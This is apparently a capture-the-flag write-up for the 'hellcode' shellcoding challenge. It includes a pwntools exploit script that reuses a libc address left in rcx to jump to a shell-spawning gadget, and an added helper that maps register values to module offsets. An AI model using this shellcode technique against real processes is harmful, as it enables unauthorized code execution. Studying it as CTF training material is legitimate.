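```python
from pwn import *

# Connect to the challenge shell server (credentials are masked in the original post)
shell = ssh("team****", "shell.angstromctf.com", port=22, password="****")
# p = process("./hellcode")  # local test run
context.arch = 'amd64'  # assemble the payload as x86-64
sh = shell.process('/bin/sh', env={'PS1': ''})
p = shell.process("/problems/hellcode/hellcode")

# rcx holds a libc address when the shellcode starts (0x7f2b06d28777 with libc
# base 0x7f2b06c27000); subtract the fixed distance to libc base + 0x45216,
# then push the result and ret to jump there
pay = "sub rcx, 0x%x; push rcx; ret" % (0x7f2b06d28777 - (0x7f2b06c27000 + 0x45216))
p.sendline(asm(pay))
p.interactive()
```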
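The challenge can be solved easily this way.
In shellcoding challenges, if you look closely at the registers at the moment the shellcode starts executing, they sometimes contain a libc address,
so making good use of that can make the challenge easy to solve.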
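The register check described above, as an added example (not part of the original post): it resolves each register value in a snapshot against a `/proc/<pid>/maps` listing and reports the module-relative offset, which stays the same across ASLR placements. The `rcx` value, libc base and binary path are taken from the solve script; the libc path, the other registers, the remaining map lines and the helper names are constructed for illustration.

```python
import re

# Constructed /proc/<pid>/maps excerpt. Only the libc base and the binary path
# come from the solve script; sizes, inodes and the other ranges are made up.
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 08:01 1234 /problems/hellcode/hellcode
7f2b06c27000-7f2b06de7000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc.so.6
7f2b06de7000-7f2b06fe7000 ---p 001c0000 08:01 5678 /lib/x86_64-linux-gnu/libc.so.6
7ffc1a2b0000-7ffc1a2d1000 rw-p 00000000 00:00 0 [stack]
"""
LIBC = "/lib/x86_64-linux-gnu/libc.so.6"  # assumed path, not stated in the post

# Register snapshot at shellcode entry. rcx is the value used in the script;
# the other registers are constructed.
SAMPLE_REGS = {"rax": 0x0, "rcx": 0x7F2B06D28777, "rdx": 0x1000, "rsp": 0x7FFC1A2CF8A0}

MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+[0-9a-f]+\s+\S+\s+\d+\s*(.*)$")

def parse_maps(text):
    """Return [(start, end, perms, path)] for every mapping line."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            regions.append((int(m[1], 16), int(m[2], 16), m[3], m[4]))
    return regions

def classify(regs, regions):
    """Map register -> (path, offset from that module's base), or None if unmapped."""
    result = {}
    for name, value in regs.items():
        hit = next((r for r in regions if r[0] <= value < r[1]), None)
        if hit is None:
            result[name] = None
            continue
        path = hit[3]
        # Module base = lowest mapping with the same path (anonymous: region start).
        base = min(r[0] for r in regions if r[3] == path) if path else hit[0]
        result[name] = (path, value - base)
    return result

def slide_module(regions, path, delta):
    """Simulate a different ASLR placement of one module."""
    return [(s + delta, e + delta, p, n) if n == path else (s, e, p, n) for s, e, p, n in regions]

if __name__ == "__main__":
    for reg, info in classify(SAMPLE_REGS, parse_maps(SAMPLE_MAPS)).items():
        print(reg, "unmapped" if info is None else f"{info[0]} + {info[1]:#x}")
```

A register that resolves into a shared library gives the code running at that point a fixed-distance reference into that library, whatever base ASLR picked for the run.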